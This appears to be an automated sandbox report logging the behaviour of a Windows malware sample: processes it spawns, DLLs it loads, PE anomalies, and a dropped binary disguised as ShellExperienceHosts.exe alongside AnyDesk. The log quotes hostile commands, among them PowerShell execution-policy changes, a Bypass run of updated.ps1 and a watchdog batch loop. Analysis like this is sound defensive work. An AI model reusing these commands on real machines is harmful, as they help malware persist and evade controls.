Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1	Jump to behavior

Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: yyzybase.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: dinput8.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"

Source: AnyDesk.exe.lnk.3.dr

LNK file: ..\..\Public\Bulete\AnyDesk.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PKHDJwnF0I.exe

Static file information: File size 6400844 > 1048576

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2535753815.0000000006FB3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2521338390.0000000002BF7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_loader\AnyDesk.pdb source: AnyDesk.exe.0.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbR source: powershell.exe, 00000011.00000002.2537362052.0000000007084000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbf source: powershell.exe, 00000011.00000002.2543631691.000000000822C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\buildslave\unity\build\artifacts\WindowsPlayer\Win32_VS2019_nondev_i_r\WindowsPlayer_Master_il2cpp_x86.pdb source: ShellExperienceHosts.exe, ShellExperienceHosts.exe, 00000003.00000000.1703765856.000000000040C000.00000002.00000001.01000000.00000005.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2537362052.0000000007084000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbx source: powershell.exe, 00000011.00000002.2543631691.000000000822C000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032D7490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,

3_2_032D7490

Source: initial sample

Static PE information: section where entry point is pointing to: .tp6d

Source: yyzyBase.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x21dd44
Source: PKHDJwnF0I.exe	Static PE information: real checksum: 0x69041 should be: 0x61c43a
Source: backup.dll.3.dr	Static PE information: real checksum: 0x0 should be: 0x21dd44

Source: ShellExperienceHosts.exe.0.dr	Static PE information: section name: .tp6
Source: ShellExperienceHosts.exe.0.dr	Static PE information: section name: .tp6a
Source: ShellExperienceHosts.exe.0.dr	Static PE information: section name: .tp6
Source: ShellExperienceHosts.exe.0.dr	Static PE information: section name: .tp6
Source: ShellExperienceHosts.exe.0.dr	Static PE information: section name: .tp6d
Source: backup.exe.3.dr	Static PE information: section name: .tp6
